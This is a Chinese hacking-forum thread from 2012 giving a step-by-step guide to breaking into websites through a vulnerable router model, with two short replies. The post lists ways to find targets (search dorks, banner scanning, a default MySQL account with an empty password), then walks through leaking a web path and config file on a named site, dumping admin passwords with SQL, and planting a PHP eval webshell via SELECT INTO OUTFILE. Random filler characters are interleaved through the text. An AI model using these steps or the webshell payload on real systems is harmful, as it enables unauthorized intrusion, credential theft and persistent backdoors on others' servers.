找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2646|回复: 2
打印 上一主题 下一主题

利用某路由器漏洞入侵国外站点

[复制链接]
跳转到指定楼层
楼主
发表于 2012-12-10 10:30:18 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
  寻找存在漏洞的路由器方法:
6 s" q: N9 G5 @/ w% n, k8 R4 n* c. J- ~& C9 T/ M3 o
1:google搜索'Raonet Subscriber Ethernet Router'
0 X! `4 L& t8 L; G+ s0 g8 }( @3 j, P3 R
2:使用WebDAVScan扫80端口,http banner为thttpd/2.21b 23apr2001
, {+ N, T, @3 E' h2 m
+ f& f# w6 ^1 u  E3:扫mysql版本号判断,SER系列路由器使用的mysql版本4.0.14,默认有一个高权限的帐户mysql,口令为空。8 u  I% a' S8 d; a/ T2 ^0 L  z  v8 ~
7 N' g! Q5 w! |. _% q
//还有很多方法可以批量获取,这里不发了,请自食其力 公开了大家都玩不成......
; Z/ ]+ r3 ?$ K
6 O' M: t( a" D# ?" R$ Q; o 9 e/ \# f: e$ P; b4 d! }& S- o/ P

4 f% O1 x7 }  n+ ~# I# l3 b入侵步骤:* U/ x% E' I( d# {4 k  y1 ~
) d  I" Z" m/ k$ E5 A- l) \- A
1.爆web路径,http://www.yu1u.org/src/jpgraph_line.php) S. G- M3 b+ L  a- F

1 Y+ ?. w* r  U, w, w. N2:查看数据库配置文件,http://www.yu1u.org/inc/conn_db.inc& F4 f* s' v5 ]: p
3:得到密码后连接,查看GUI管理密码:
1 ], }( ~/ `* K$ N* Y3 tuse ser_500/ f, h8 s- y  E/ ^
select id,passwd from user;
" }' t0 D& ~/ e! Z  C; u4:通过数据库写入webshell,执行命令:
5 P5 ]. [* s* Z* C9 ^. ^% Tuse mysql;- m2 B- p: W# G5 t# ?+ q
create table ok(cmd TEXT);
, |" O  Z: s% l; w8 ~) o5 Uinsert into ok values("<?php @eval($_POST[cmd])?>");" j  Z- `$ R7 V  u7 b6 m
select * from ok into outfile "\/usr\/local\/www\/data\/src\/shell.php";
- T* n- H, s' W$ q- v: U- Y8 Q5 xdrop table ok;, e1 Y& M5 v2 T" a& t' [) C' I
, i) v2 s( j) P) x2 R
5:连接后门shell.php # a3 V8 B. O& r( s6 N: b+ Q* C

' k3 O2 l+ Z: w% f. {8 Y  J3 E6. 搞定!' K7 n! Y7 M+ g3 Y8 ^. C4 E
0 _6 E7 s0 E! f0 Y6 L
回复

使用道具 举报

沙发
发表于 2013-7-27 20:06:50 | 只看该作者
这个后果可以很严重的说
回复 支持 反对

使用道具 举报

板凳
发表于 2013-7-29 12:07:54 | 只看该作者
不错哦,黑服务器补洞。。
回复 支持 反对

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表